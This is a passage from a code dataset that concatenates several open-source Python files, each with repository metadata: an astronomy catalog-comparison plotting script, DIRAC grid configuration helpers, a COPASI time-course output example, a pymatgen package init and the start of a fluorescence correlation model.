    I = np.flatnonzero((matched1.type == 'PSF') * (matched2.type == 'PSF'))
    print(len(I), 'PSF to PSF')
    plt.plot(matched1.dchisq[I,0] - matched1.dchisq[I,1],
             matched2.dchisq[I,0] - matched2.dchisq[I,1], 'k.', label='PSF to PSF')
    I = np.flatnonzero((matched1.type == 'PSF') * (matched2.type == 'SIMP'))
    print(len(I), 'PSF to SIMP')
    plt.plot(matched1.dchisq[I,0] - matched1.dchisq[I,1],
             matched2.dchisq[I,0] - matched2.dchisq[I,1], 'r.', label='PSF to SIMP')
    I = np.flatnonzero((matched1.type == 'SIMP') * (matched2.type == 'PSF'))
    print(len(I), 'SIMP to PSF')
    plt.plot(matched1.dchisq[I,0] - matched1.dchisq[I,1],
             matched2.dchisq[I,0] - matched2.dchisq[I,1], 'g.', label='SIMP to PSF')
    I = np.flatnonzero((matched1.type == 'SIMP') * (matched2.type == 'SIMP'))
    print(len(I), 'SIMP to SIMP')
    plt.plot(matched1.dchisq[I,0] - matched1.dchisq[I,1],
             matched2.dchisq[I,0] - matched2.dchisq[I,1], 'b.', label='SIMP to SIMP')
    plt.xlabel('%s dchisq: PSF - SIMP' % name1)
    plt.ylabel('%s dchisq: PSF - SIMP' % name2)
    plt.legend(loc='upper left')
    #plt.xscale('symlog')
    #plt.yscale('symlog')
    plt.plot([-20,20],[-20,20], 'k-', alpha=0.5)
    plt.axhline(0, color='k', alpha=0.5)
    plt.axvline(0, color='k', alpha=0.5)
    plt.axis([-20,20,-20,20])
    ps.savefig()

    # Galaxy effective-radius comparison for sources typed the same way.
    plt.clf()
    I = np.flatnonzero((matched1.type == 'EXP') * (matched2.type == 'EXP'))
    plt.plot(matched1.shapeexp_r[I], matched2.shapeexp_r[I], 'r.', label='exp')
    I = np.flatnonzero((matched1.type == 'DEV') * (matched2.type == 'DEV'))
    plt.plot(matched1.shapedev_r[I], matched2.shapedev_r[I], 'b.', label='dev')
    plt.xlabel('%s radius (arcsec)' % name1)
    plt.ylabel('%s radius (arcsec)' % name2)
    plt.axis([0,4,0,4])
    plt.legend()
    ps.savefig()

    # Per-band (g, r, z) raw flux comparison with error bars.
    for iband,band,cc in [(1,'g','g'),(2,'r','r'),(4,'z','m')]:
        K = np.flatnonzero((matched1.decam_flux_ivar[:,iband] > 0) *
                           (matched2.decam_flux_ivar[:,iband] > 0))

        print('Median mw_trans', band, 'is',
              np.median(matched1.decam_mw_transmission[:,iband]))

        plt.clf()
        plt.errorbar(matched1.decam_flux[K,iband],
                     matched2.decam_flux[K,iband],
                     fmt='.', color=cc,
                     xerr=1./np.sqrt(matched1.decam_flux_ivar[K,iband]),
                     yerr=1./np.sqrt(matched2.decam_flux_ivar[K,iband]),
                     alpha=0.1,
                     )
        plt.xlabel('%s flux: %s' % (name1, band))
        plt.ylabel('%s flux: %s' % (name2, band))
        plt.plot([-1e6, 1e6], [-1e6,1e6], 'k-', alpha=1.)
        plt.axis([-100, 1000, -100, 1000])
        plt.title(tt)
        ps.savefig()

    # Per-band flux difference normalized by the combined errors, vs mag.
    for iband,band,cc in [(1,'g','g'),(2,'r','r'),(4,'z','m')]:
        good = ((matched1.decam_flux_ivar[:,iband] > 0) *
                (matched2.decam_flux_ivar[:,iband] > 0))
        K = np.flatnonzero(good)
        # (bugfix) types were stripped above: compare to 'PSF', not 'PSF '.
        psf1 = (matched1.type == 'PSF')
        psf2 = (matched2.type == 'PSF')
        P = np.flatnonzero(good * psf1 * psf2)

        mag1, magerr1 = NanoMaggies.fluxErrorsToMagErrors(
            matched1.decam_flux[:,iband], matched1.decam_flux_ivar[:,iband])

        iv1 = matched1.decam_flux_ivar[:, iband]
        iv2 = matched2.decam_flux_ivar[:, iband]
        std = np.sqrt(1./iv1 + 1./iv2)

        plt.clf()
        plt.plot(mag1[K],
                 (matched2.decam_flux[K,iband] - matched1.decam_flux[K,iband]) / std[K],
                 '.', alpha=0.1, color=cc)
        plt.plot(mag1[P],
                 (matched2.decam_flux[P,iband] - matched1.decam_flux[P,iband]) / std[P],
                 '.', alpha=0.1, color='k')
        plt.ylabel('(%s - %s) flux / flux errors (sigma): %s' % (name2, name1, band))
        plt.xlabel('%s mag: %s' % (name1, band))
        plt.axhline(0, color='k', alpha=0.5)
        plt.axis([24, 16, -10, 10])
        plt.title(tt)
        ps.savefig()

    # Overlaid per-band histograms of the error-normalized flux differences
    # for bright PSF sources, with the unit Gaussian expectation overplotted.
    plt.clf()
    lp,lt = [],[]
    for iband,band,cc in [(1,'g','g'),(2,'r','r'),(4,'z','m')]:
        good = ((matched1.decam_flux_ivar[:,iband] > 0) *
                (matched2.decam_flux_ivar[:,iband] > 0))
        #good = True
        # (bugfix) types were stripped above: compare to 'PSF', not 'PSF '.
        psf1 = (matched1.type == 'PSF')
        psf2 = (matched2.type == 'PSF')
        mag1, magerr1 = NanoMaggies.fluxErrorsToMagErrors(
            matched1.decam_flux[:,iband], matched1.decam_flux_ivar[:,iband])

        iv1 = matched1.decam_flux_ivar[:, iband]
        iv2 = matched2.decam_flux_ivar[:, iband]
        std = np.sqrt(1./iv1 + 1./iv2)
        #std = np.hypot(std, 0.01)

        G = np.flatnonzero(good * psf1 * psf2 *
                           np.isfinite(mag1) *
                           (mag1 >= 20) * (mag1 < dict(g=24, r=23.5, z=22.5)[band]))

        n,b,p = plt.hist((matched2.decam_flux[G,iband] -
                          matched1.decam_flux[G,iband]) / std[G],
                         range=(-4, 4), bins=50, histtype='step', color=cc,
                         normed=True)

        sig = (matched2.decam_flux[G,iband] -
               matched1.decam_flux[G,iband]) / std[G]
        print('Raw mean and std of points:', np.mean(sig), np.std(sig))
        med = np.median(sig)
        # Robust width estimate from the 16th/84th percentiles.
        rsigma = (np.percentile(sig, 84) - np.percentile(sig, 16)) / 2.
        print('Median and percentile-based sigma:', med, rsigma)
        lp.append(p[0])
        lt.append('%s: %.2f +- %.2f' % (band, med, rsigma))

        # Expected unit-Gaussian density evaluated on this band's bins.
        bins = []
        gaussint = []
        for blo,bhi in zip(b, b[1:]):
            c = scipy.stats.norm.cdf(bhi) - scipy.stats.norm.cdf(blo)
            c /= (bhi - blo)
            #bins.extend([blo,bhi])
            #gaussint.extend([c,c])
            bins.append((blo+bhi)/2.)
            gaussint.append(c)
        plt.plot(bins, gaussint, 'k-', lw=2, alpha=0.5)

    plt.title(tt)
    plt.xlabel('Flux difference / error (sigma)')
    plt.axvline(0, color='k', alpha=0.1)
    plt.ylim(0, 0.45)
    plt.legend(lp, lt, loc='upper right')
    ps.savefig()

    # Per-band magnitude comparisons and binned statistics of the
    # error-normalized differences.
    for iband,band,cc in [(1,'g','g'),(2,'r','r'),(4,'z','m')]:
        plt.clf()
        mag1, magerr1 = NanoMaggies.fluxErrorsToMagErrors(
            matched1.decam_flux[:,iband], matched1.decam_flux_ivar[:,iband])
        mag2, magerr2 = NanoMaggies.fluxErrorsToMagErrors(
            matched2.decam_flux[:,iband], matched2.decam_flux_ivar[:,iband])

        meanmag = NanoMaggies.nanomaggiesToMag((
            matched1.decam_flux[:,iband] + matched2.decam_flux[:,iband]) / 2.)

        # (bugfix) types were stripped above: compare to 'PSF', not 'PSF '.
        psf1 = (matched1.type == 'PSF')
        psf2 = (matched2.type == 'PSF')
        good = ((matched1.decam_flux_ivar[:,iband] > 0) *
                (matched2.decam_flux_ivar[:,iband] > 0) *
                np.isfinite(mag1) * np.isfinite(mag2))
        K = np.flatnonzero(good)
        P = np.flatnonzero(good * psf1 * psf2)

        plt.errorbar(mag1[K], mag2[K], fmt='.', color=cc,
                     xerr=magerr1[K], yerr=magerr2[K], alpha=0.1)
        plt.plot(mag1[P], mag2[P], 'k.', alpha=0.5)
        plt.xlabel('%s %s (mag)' % (name1, band))
        plt.ylabel('%s %s (mag)' % (name2, band))
        plt.plot([-1e6, 1e6], [-1e6,1e6], 'k-', alpha=1.)
        plt.axis([24, 16, 24, 16])
        plt.title(tt)
        ps.savefig()

        plt.clf()
        plt.errorbar(mag1[K], mag2[K] - mag1[K], fmt='.', color=cc,
                     xerr=magerr1[K], yerr=magerr2[K], alpha=0.1)
        plt.plot(mag1[P], mag2[P] - mag1[P], 'k.', alpha=0.5)
        plt.xlabel('%s %s (mag)' % (name1, band))
        plt.ylabel('%s %s - %s %s (mag)' % (name2, band, name1, band))
        plt.axhline(0., color='k', alpha=1.)
        plt.axis([24, 16, -1, 1])
        plt.title(tt)
        ps.savefig()

        magbins = np.arange(16, 24.001, 0.5)

        plt.clf()
        plt.plot(mag1[K], (mag2[K]-mag1[K]) / np.hypot(magerr1[K], magerr2[K]),
                 '.', color=cc, alpha=0.1)
        plt.plot(mag1[P], (mag2[P]-mag1[P]) / np.hypot(magerr1[P], magerr2[P]),
                 'k.', alpha=0.5)
        plt.xlabel('%s %s (mag)' % (name1, band))
        plt.ylabel('(%s %s - %s %s) / errors (sigma)' %
                   (name2, band, name1, band))
        plt.axhline(0., color='k', alpha=1.)
        plt.axis([24, 16, -10, 10])
        plt.title(tt)
        ps.savefig()

        y = (mag2 - mag1) / np.hypot(magerr1, magerr2)

        plt.clf()
        plt.plot(meanmag[P], y[P], 'k.', alpha=0.1)

        midmag = []
        vals = np.zeros((len(magbins)-1, 5))
        median_err1 = []

        # Inter-quartile distance of a unit Gaussian, for width comparisons.
        iqd_gauss = scipy.stats.norm.ppf(0.75) - scipy.stats.norm.ppf(0.25)

        # FIXME -- should we do some stats after taking off the mean difference?

        for bini,(mlo,mhi) in enumerate(zip(magbins, magbins[1:])):
            I = P[(meanmag[P] >= mlo) * (meanmag[P] < mhi)]
            midmag.append((mlo+mhi)/2.)
            median_err1.append(np.median(magerr1[I]))
            if len(I) == 0:
                continue
            # median and +- 1 sigma quantiles
            ybin = y[I]
            vals[bini,0] = np.percentile(ybin, 16)
            vals[bini,1] = np.median(ybin)
            vals[bini,2] = np.percentile(ybin, 84)
            # +- 2 sigma quantiles
            vals[bini,3] = np.percentile(ybin, 2.3)
            vals[bini,4] = np.percentile(ybin, 97.7)

            iqd = np.percentile(ybin, 75) - np.percentile(ybin, 25)
            print('Mag bin', midmag[-1], ': IQD is factor', iqd / iqd_gauss,
                  'vs expected for Gaussian;', len(ybin), 'points')

            # if iqd > iqd_gauss:
            #     # What error adding in quadrature would you need to make the IQD match?
            #     err = median_err1[-1]
            #     target_err = err * (iqd / iqd_gauss)
            #     sys_err = np.sqrt(target_err**2 - err**2)
            #     print('--> add systematic error', sys_err)

        # ~ Johan's cuts
        mlo = 21.
        mhi = dict(g=24., r=23.5, z=22.5)[band]
        I = P[(meanmag[P] >= mlo) * (meanmag[P] < mhi)]
        ybin = y[I]
        iqd = np.percentile(ybin, 75) - np.percentile(ybin, 25)
        print('Mag bin', mlo, mhi, 'band', band, ': IQD is factor',
              iqd / iqd_gauss, 'vs expected for Gaussian;', len(ybin), 'points')
        if iqd > iqd_gauss:
            # What error adding in quadrature would you need to make
            # the IQD match?
            err = np.median(np.hypot(magerr1[I], magerr2[I]))
            print('Median error (hypot):', err)
            target_err = err * (iqd / iqd_gauss)
            print('Target:', target_err)
            sys_err = np.sqrt((target_err**2 - err**2) / 2.)
            print('--> add systematic error', sys_err)

            # check...
            err_sys = np.hypot(np.hypot(magerr1, sys_err),
                               np.hypot(magerr2, sys_err))
            ysys = (mag2 - mag1) / err_sys
            ysys = ysys[I]
            print('Resulting median error:', np.median(err_sys[I]))
            iqd_sys = np.percentile(ysys, 75) - np.percentile(ysys, 25)
            print('--> IQD', iqd_sys / iqd_gauss, 'vs Gaussian')
            # Hmmm, this doesn't work... totally overshoots.

        plt.errorbar(midmag, vals[:,1], fmt='o', color='b',
                     yerr=(vals[:,1]-vals[:,0], vals[:,2]-vals[:,1]),
                     capthick=3, zorder=20)
        plt.errorbar(midmag, vals[:,1], fmt='o', color='b',
                     yerr=(vals[:,1]-vals[:,3], vals[:,4]-vals[:,1]),
                     capthick=2, zorder=20)
        plt.axhline( 1., color='b', alpha=0.2)
        plt.axhline(-1., color='b', alpha=0.2)
        plt.axhline( 2., color='b', alpha=0.2)
        plt.axhline(-2., color='b', alpha=0.2)

        # Annotate each bin with its median catalog-1 magnitude error.
        for mag,err,y in zip(midmag, median_err1, vals[:,3]):
            if not np.isfinite(err):
                continue
            if y < -6:
                continue
            plt.text(mag, y-0.1, '%.3f' % err, va='top', ha='center', color='k',
                     fontsize=10)

        plt.xlabel('(%s + %s)/2 %s (mag), PSFs' % (name1, name2, band))
        plt.ylabel('(%s %s - %s %s) / errors (sigma)' %
                   (name2, band, name1, band))
        plt.axhline(0., color='k', alpha=1.)

        plt.axvline(21, color='k', alpha=0.3)
        plt.axvline(dict(g=24, r=23.5, z=22.5)[band], color='k', alpha=0.3)

        plt.axis([24.1, 16, -6, 6])
        plt.title(tt)
        ps.savefig()

        #magbins = np.append([16, 18], np.arange(20, 24.001, 0.5))
        if band == 'g':
            magbins = [20, 24]
        elif band == 'r':
            magbins = [20, 23.5]
        elif band == 'z':
            magbins = [20, 22.5]

        slo,shi = -5,5
        plt.clf()
        ha = dict(bins=25, range=(slo,shi), histtype='step', normed=True)
        y = (mag2 - mag1) / np.hypot(magerr1, magerr2)
        midmag = []
        nn = []
        rgbs = []
        lt,lp = [],[]
        for bini,(mlo,mhi) in enumerate(zip(magbins, magbins[1:])):
            I = P[(mag1[P] >= mlo) * (mag1[P] < mhi)]
            if len(I) == 0:
                continue
            ybin = y[I]
            # Bin color ramps from blue (faint bin index 0) to red.
            rgb = [0.,0.,0.]
            rgb[0] = float(bini) / (len(magbins)-1)
            rgb[2] = 1. - rgb[0]
            n,b,p = plt.hist(ybin, color=rgb, **ha)
            lt.append('mag %g to %g' % (mlo,mhi))
            lp.append(p[0])
            midmag.append((mlo+mhi)/2.)
            nn.append(n)
            rgbs.append(rgb)

        # Unit-Gaussian expectation drawn as a step function over the bins.
        bins = []
        gaussint = []
        for blo,bhi in zip(b, b[1:]):
            #midbin.append((blo+bhi)/2.)
            #gaussint.append(scipy.stats.norm.cdf(bhi) -
            #                scipy.stats.norm.cdf(blo))
            c = scipy.stats.norm.cdf(bhi) - scipy.stats.norm.cdf(blo)
            c /= (bhi - blo)
            bins.extend([blo,bhi])
            gaussint.extend([c,c])
        plt.plot(bins, gaussint, 'k-', lw=2, alpha=0.5)

        plt.legend(lp, lt)
        plt.title(tt)
        plt.xlim(slo,shi)
        ps.savefig()

        # Same histograms re-drawn as line plots at the bin centers.
        bincenters = b[:-1] + (b[1]-b[0])/2.
        plt.clf()
        lp = []
        for n,rgb,mlo,mhi in zip(nn, rgbs, magbins, magbins[1:]):
            p = plt.plot(bincenters, n, '-', color=rgb)
            lp.append(p[0])
        plt.plot(bincenters, gaussint[::2], 'k-', alpha=0.5, lw=2)
        plt.legend(lp, lt)
        plt.title(tt)
        plt.xlim(slo,shi)
        ps.savefig()
# Standard script entry point.
if __name__ == '__main__':
    main()
| legacysurvey/pipeline | py/legacyanalysis/compare-two-catalogs.py | Python | gpl-2.0 | 18,973 | [
"Gaussian"
] | 428cf1e2b40e6f3c4176ca352293c7761ab09231e4ece67817d075d21d66233f |
# $HeadURL$
__RCSID__ = "$Id$"
import re
from distutils.version import LooseVersion
from DIRAC import S_OK, S_ERROR, gConfig
from DIRAC.ConfigurationSystem.Client.Helpers.Path import cfgPath
from DIRAC.Core.Utilities.List import uniqueElements
gBaseResourcesSection = "/Resources"
def getSites():
  """ Return S_OK with the list of all site names defined in the CS,
      across every grid section under /Resources/Sites.
  """
  gridsResult = gConfig.getSections( cfgPath( gBaseResourcesSection, 'Sites' ) )
  if not gridsResult['OK']:
    return gridsResult
  siteList = []
  for gridName in gridsResult['Value']:
    sitesResult = gConfig.getSections( cfgPath( gBaseResourcesSection, 'Sites', gridName ) )
    if not sitesResult['OK']:
      return sitesResult
    siteList.extend( sitesResult['Value'] )
  return S_OK( siteList )
def getStorageElementSiteMapping( siteList = None ):
  """ Get the Storage Elements belonging to the given sites.

      :param list siteList: site names to resolve; empty/None means all
                            sites defined in the CS
      :return: S_OK( { site : [ SE, ... ] } ) containing only sites that
               declare at least one SE
  """
  # Bugfix: the original used a mutable default argument ( siteList = [] ),
  # which is shared between calls in Python.  None is used as the sentinel
  # instead; any falsy value still means "all sites".
  if not siteList:
    result = getSites()
    if not result['OK']:
      return result
    siteList = result['Value']
  siteDict = {}
  for site in siteList:
    grid = site.split( '.' )[0]
    ses = gConfig.getValue( cfgPath( gBaseResourcesSection, 'Sites', grid, site, 'SE' ), [] )
    if ses:
      siteDict[site] = ses
  return S_OK( siteDict )
def getFTS2ServersForSites( self, siteList = None ):
  """ Get the FTS2 server endpoint for each of the given sites.

      :param list siteList: list of sites; empty/None means all CS sites
      :return: S_OK( { site : endpoint } ), omitting sites with no endpoint
  """
  # NOTE(review): the leading `self` parameter looks like a leftover from a
  # method definition -- a caller invoking getFTS2ServersForSites( mySites )
  # would bind the site list to `self` and leave siteList as None.  Confirm
  # against the callers before relying on this signature.
  siteList = siteList if siteList else None  # normalise falsy values (e.g. []) to None
  if not siteList:
    siteList = getSites()
    if not siteList["OK"]:
      return siteList
    siteList = siteList["Value"]
  ftsServers = dict()
  # Site-independent fallback endpoint.
  defaultServ = gConfig.getValue( cfgPath( gBaseResourcesSection, 'FTSEndpoints/Default', 'FTSEndpoint' ), '' )
  for site in siteList:
    # Per-site endpoint, falling back to the default; sites resolving to an
    # empty string are skipped.
    serv = gConfig.getValue( cfgPath( gBaseResourcesSection, "FTSEndpoints/FTS2", site ), defaultServ )
    if serv:
      ftsServers[site] = serv
  return S_OK( ftsServers )
def getFTS3Servers():
  """ Return S_OK with the configured FTS3 server URLs, preserving the
      order in which the options are declared in the CS.
  """
  csPath = cfgPath( gBaseResourcesSection, "FTSEndpoints/FTS3" )
  # Resolve the option names first (getOptions keeps declaration order),
  # then look up each value.
  serverNames = gConfig.getOptions( csPath ).get( 'Value', [] )
  serverList = [ gConfig.getValue( cfgPath( csPath, name ) ) for name in serverNames ]
  return S_OK( serverList )
def getSiteTier( site ):
  """ Return S_OK with the MoU tier level of the given site
      (defaults to 2 when the option is absent).
  """
  pathResult = getSitePath( site )
  if not pathResult['OK']:
    return pathResult
  tierLevel = gConfig.getValue( cfgPath( pathResult['Value'], 'MoUTierLevel' ), 2 )
  return S_OK( tierLevel )
def getSitePath( site ):
  """ Return S_OK with the CS path of the Site section for the given site """
  gridResult = getSiteGrid( site )
  if not gridResult['OK']:
    return gridResult
  return S_OK( cfgPath( gBaseResourcesSection, 'Sites', gridResult['Value'], site ) )
def getSiteGrid( site ):
  """ Extract the Grid component from a site name of the form
      GRID.NAME.COUNTRY; S_ERROR for any other format.
  """
  nameParts = site.split( "." )
  if len( nameParts ) != 3:
    return S_ERROR( 'Wrong Site Name format' )
  return S_OK( nameParts[0] )
def getStorageElementOptions( seName ):
  """ Get the CS options of the given StorageElement.

      Two derived booleans, DiskSE and TapeSE, are added based on the SEType
      option, which follows the TXDY convention (e.g. T0D1, T1D0).

      :param str seName: StorageElement name
      :return: S_OK( optionsDict ) or the gConfig error
  """
  storageConfigPath = '/Resources/StorageElements/%s' % seName
  result = gConfig.getOptionsDict( storageConfigPath )
  if not result['OK']:
    return result
  options = result['Value']

  # Help distinguishing storage type: without an SEType, assume pure disk.
  diskSE = True
  tapeSE = False
  # dict.has_key() is Python-2-only and deprecated; "in" works everywhere.
  if 'SEType' in options:
    # Type should follow the convention TXDY
    seType = options['SEType']
    diskSE = re.search( 'D[1-9]', seType ) is not None
    tapeSE = re.search( 'T[1-9]', seType ) is not None
  options['DiskSE'] = diskSE
  options['TapeSE'] = tapeSE

  return S_OK( options )
def getQueue( site, ce, queue ):
  """ Return the merged CE + queue parameters of one queue.

  The CE-level options are fetched first and then overridden/extended by
  the queue-level options; the queue name itself is stored under 'Queue'.

  :return: S_OK( dict ) or the failing S_ERROR from the CS
  """
  grid = site.split( '.' )[0]

  ceResult = gConfig.getOptionsDict( '/Resources/Sites/%s/%s/CEs/%s' % ( grid, site, ce ) )
  if not ceResult['OK']:
    return ceResult
  parameters = ceResult['Value']

  queueResult = gConfig.getOptionsDict( '/Resources/Sites/%s/%s/CEs/%s/Queues/%s' % ( grid, site, ce, queue ) )
  if not queueResult['OK']:
    return queueResult
  parameters.update( queueResult['Value'] )

  parameters['Queue'] = queue
  return S_OK( parameters )
def getQueues( siteList = None, ceList = None, ceTypeList = None, community = None, mode = None ):
  """ Get CE/queue options according to the specified selection

  :param list siteList: restrict to these sites (None means all sites)
  :param list ceList: NOTE(review): accepted but currently unused — confirm whether filtering by CE name was intended
  :param list ceTypeList: restrict to CEs of these types
  :param str community: restrict to sites/CEs/queues that list this VO (an empty VO list means "no restriction")
  :param str mode: restrict to CEs with this SubmissionMode
  :return: S_OK( { site : { ce : { <CE options>, 'Queues' : { queue : <queue options> } } } } )
  """
  result = gConfig.getSections( '/Resources/Sites' )
  if not result['OK']:
    return result

  resultDict = {}

  grids = result['Value']
  for grid in grids:
    result = gConfig.getSections( '/Resources/Sites/%s' % grid )
    if not result['OK']:
      continue
    sites = result['Value']
    for site in sites:
      if siteList is not None and not site in siteList:
        continue
      if community:
        # Site-level VO filter
        comList = gConfig.getValue( '/Resources/Sites/%s/%s/VO' % ( grid, site ), [] )
        if comList and not community in comList:
          continue
      result = gConfig.getSections( '/Resources/Sites/%s/%s/CEs' % ( grid, site ) )
      if not result['OK']:
        continue
      ces = result['Value']
      for ce in ces:
        if mode:
          # CEs without an explicit SubmissionMode default to 'InDirect'
          ceMode = gConfig.getValue( '/Resources/Sites/%s/%s/CEs/%s/SubmissionMode' % ( grid, site, ce ), 'InDirect' )
          if not ceMode or ceMode != mode:
            continue
        if ceTypeList:
          ceType = gConfig.getValue( '/Resources/Sites/%s/%s/CEs/%s/CEType' % ( grid, site, ce ), '' )
          if not ceType or not ceType in ceTypeList:
            continue
        if community:
          # CE-level VO filter, same "empty means allow all" convention
          comList = gConfig.getValue( '/Resources/Sites/%s/%s/CEs/%s/VO' % ( grid, site, ce ), [] )
          if comList and not community in comList:
            continue
        result = gConfig.getOptionsDict( '/Resources/Sites/%s/%s/CEs/%s' % ( grid, site, ce ) )
        if not result['OK']:
          continue
        ceOptionsDict = result['Value']
        result = gConfig.getSections( '/Resources/Sites/%s/%s/CEs/%s/Queues' % ( grid, site, ce ) )
        if not result['OK']:
          continue
        queues = result['Value']
        for queue in queues:
          if community:
            # Queue-level VO filter
            comList = gConfig.getValue( '/Resources/Sites/%s/%s/CEs/%s/Queues/%s/VO' % ( grid, site, ce, queue ), [] )
            if comList and not community in comList:
              continue
          # Only create the site/CE entries once a queue actually passed
          # all the filters above
          resultDict.setdefault( site, {} )
          resultDict[site].setdefault( ce, ceOptionsDict )
          resultDict[site][ce].setdefault( 'Queues', {} )
          result = gConfig.getOptionsDict( '/Resources/Sites/%s/%s/CEs/%s/Queues/%s' % ( grid, site, ce, queue ) )
          if not result['OK']:
            continue
          queueOptionsDict = result['Value']
          resultDict[site][ce]['Queues'][queue] = queueOptionsDict

  return S_OK( resultDict )
def getCompatiblePlatforms( originalPlatforms ):
  """ Get a list of platforms compatible with the given list

  :param originalPlatforms: a single platform string or a list of them
  :return: S_OK( list of unique compatible platforms ) or S_ERROR when
           the OSCompatibility section is missing/empty
  """
  # Accept a bare string as well as a list of platforms
  if type( originalPlatforms ) == type( ' ' ):
    platforms = [originalPlatforms]
  else:
    platforms = list( originalPlatforms )

  # CS values are comma separated and may contain stray spaces
  platforms = list( platform.replace( ' ', '' ) for platform in platforms )

  result = gConfig.getOptionsDict( '/Resources/Computing/OSCompatibility' )
  if not ( result['OK'] and result['Value'] ):
    return S_ERROR( "OS compatibility info not found" )

  # platform -> list of compatible tags; each platform is also made
  # compatible with itself.
  # NOTE: dict.iteritems() makes this Python 2 only.
  platformsDict = dict( [( k, v.replace( ' ', '' ).split( ',' ) ) for k, v in result['Value'].iteritems()] )
  for k, v in platformsDict.iteritems():
    if k not in v:
      v.append( k )

  resultList = list( platforms )
  for p in platforms:
    tmpList = platformsDict.get( p, [] )
    # Also pick up platforms that declare p in their own compatibility
    # list (and everything those platforms are compatible with)
    for pp in platformsDict:
      if p in platformsDict[pp]:
        tmpList.append( pp )
        tmpList += platformsDict[pp]
    if tmpList:
      resultList += tmpList

  return S_OK( uniqueElements( resultList ) )
def getDIRACPlatform( OS ):
  """ Get standard DIRAC platform(s) compatible with the argument.

  NB: The returned value is a list! ordered, in reverse, using
  distutils.version.LooseVersion. In practice the "highest" version
  (which should be the most "desirable" one) is returned first.

  :param str OS: an OS tag as listed in the OSCompatibility section
  :return: S_OK( list of platforms, best first ) or S_ERROR
  """
  result = gConfig.getOptionsDict( '/Resources/Computing/OSCompatibility' )
  if not ( result['OK'] and result['Value'] ):
    return S_ERROR( "OS compatibility info not found" )

  # platform -> list of compatible OS tags; each platform is also
  # compatible with itself.
  # NOTE: dict.iteritems() makes this Python 2 only.
  platformsDict = dict( [( k, v.replace( ' ', '' ).split( ',' ) ) for k, v in result['Value'].iteritems()] )
  for k, v in platformsDict.iteritems():
    if k not in v:
      v.append( k )

  # making an OS -> platforms dict (inverting platformsDict)
  os2PlatformDict = dict()
  for platform, osItems in platformsDict.iteritems():
    for osItem in osItems:
      if os2PlatformDict.get( osItem ):
        os2PlatformDict[osItem].append( platform )
      else:
        os2PlatformDict[osItem] = [platform]

  if OS not in os2PlatformDict:
    return S_ERROR( 'No compatible DIRAC platform found for %s' % OS )

  platforms = os2PlatformDict[OS]
  # Newest first: LooseVersion orders the version-like platform strings
  platforms.sort( key = LooseVersion, reverse = True )

  return S_OK( platforms )
def getDIRACPlatforms():
  """ Return the list of DIRAC platforms declared in the CS.

  The platforms are the option names of
  /Resources/Computing/OSCompatibility.
  """
  compatibility = gConfig.getOptionsDict( '/Resources/Computing/OSCompatibility' )
  if not ( compatibility['OK'] and compatibility['Value'] ):
    return S_ERROR( "OS compatibility info not found" )
  return S_OK( compatibility['Value'].keys() )
def getCatalogPath( catalogName ):
  """ Return the configuration path of the description for a given catalog.

  :param str catalogName: name of the file catalog
  :return: CS path string (no existence check is performed)
  """
  return '/Resources/FileCatalogs/%s' % catalogName
def getRegistrationProtocols():
  """ Return the favourite registration protocols defined in the CS.

  Falls back to ['srm', 'dips'] when the option is not defined.
  """
  return gConfig.getValue( '/Resources/FileCatalogs/RegistrationProtocols', ['srm', 'dips'] )
def getThirdPartyProtocols():
  """ Return the favourite third-party transfer protocols defined in the CS.

  Falls back to ['srm', 'dips'] when the option is not defined.
  """
  return gConfig.getValue( '/Resources/FileCatalogs/ThirdPartyProtocols', ['srm', 'dips'] )
| vmendez/DIRAC | ConfigurationSystem/Client/Helpers/Resources.py | Python | gpl-3.0 | 9,897 | [
"DIRAC"
] | 8304e756594115091ccc4b532f66887b8179509128a161a831283eed1ef4327d |
#!/usr/bin/env python3
import COPASI

# Module-wide COPASI data model; used by create_datahandler() and the
# __main__ block below.
dm = COPASI.CRootContainer.addDatamodel()
def create_datahandler(names):
    """Initialize a CDataHandler collecting the given display names.

    Each name is resolved against the module-level data model ``dm``;
    unresolvable names are reported and skipped. The returned handler
    records the corresponding common names during a task run.

    :param names: iterable of COPASI display names (e.g. 'Time', '[X]')
    :return: a COPASI.CDataHandler with the during-names registered
    """
    dh = COPASI.CDataHandler()
    for name in names:
        obj = dm.findObjectByDisplayName(name)
        if not obj:
            print('no object for name {0}'.format(name))
            continue
        if isinstance(obj, COPASI.CModel):  # fix for time: use the model's value reference
            obj = obj.getValueReference()
        cn = obj.getCN().getString()
        dh.addDuringName(COPASI.CRegisteredCommonName(cn))
        print('added {0}'.format(cn))
    return dh
def print_results(dh):
    """Dump the rows collected by *dh* to stdout as tab-separated values."""
    for row_index in range(dh.getNumRowsDuring()):
        row = dh.getNthRow(row_index)
        for value in row:
            print('{0}\t'.format(value), end='')
        print('\n', end='')
if __name__ == "__main__":
    # the brusselator example is distributed with copasi, or grab it from:
    # https://github.com/copasi/COPASI/blob/develop/TestSuite/distribution/brusselator.cps
    dm.loadModel('brusselator.cps')
    # Collect time, the two species concentrations and one reaction flux
    dh = create_datahandler(['Time', '[X]', '[Y]', '(R4).Flux'])
    tc = dm.getTask('Time-Course')
    # Attach the handler so values are captured during the simulation run
    tc.initializeRawWithOutputHandler(COPASI.CCopasiTask.OUTPUT_DURING, dh)
    tc.processRaw(True)
    print_results(dh)
| copasi/COPASI | copasi/bindings/python/examples/custom_output.py | Python | artistic-2.0 | 1,243 | [
"COPASI"
] | d7712838b34adfe960de74c8817cfc1f67ee10d06c85a310bd28296fe13686e4 |
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This package contains standard serializers that can work generally for all
pymatgen objects.
"""
| sonium0/pymatgen | pymatgen/serializers/__init__.py | Python | mit | 211 | [
"pymatgen"
] | 63623c5dfc0698956f1b09f7cef5da1ee38414ed8d6b1d83780041ea69c3bd3f |
import numpy as np
from .control import model_setup
from .cp_confocal import twod
from .cp_triplet import trip
# 2D + TT Gauß
# Model 6003
def CF_Gxy_gauss_2DTT(parms, tau):
    u""" Two-dimensional free diffusion
        with a Gaussian laser profile, including two triplet components.
        The triplet factor takes into account a blinking term.
        Set *T* or *τ_trip* to 0, if no triplet component is wanted.

        particle = 1/(1+τ/τ_diff)
        triplet1 = 1 + T₁/(1-T₁)*exp(-τ/τ_trip₁)
        triplet2 = 1 + T₂/(1-T₂)*exp(-τ/τ_trip₂)
        G = 1/n*particle*triplet1*triplet2 + offset

        *parms* - a list of parameters.
        Parameters (parms[i]):
        [0] n       Effective number of particles in confocal volume
        [1] τ_diff  Diffusion time of particle
        [2] τ_trip₁ Characteristic residence time in triplet state
        [3] T₁      Fraction of particles in triplet (non-fluorescent) state
                    0 <= T < 1
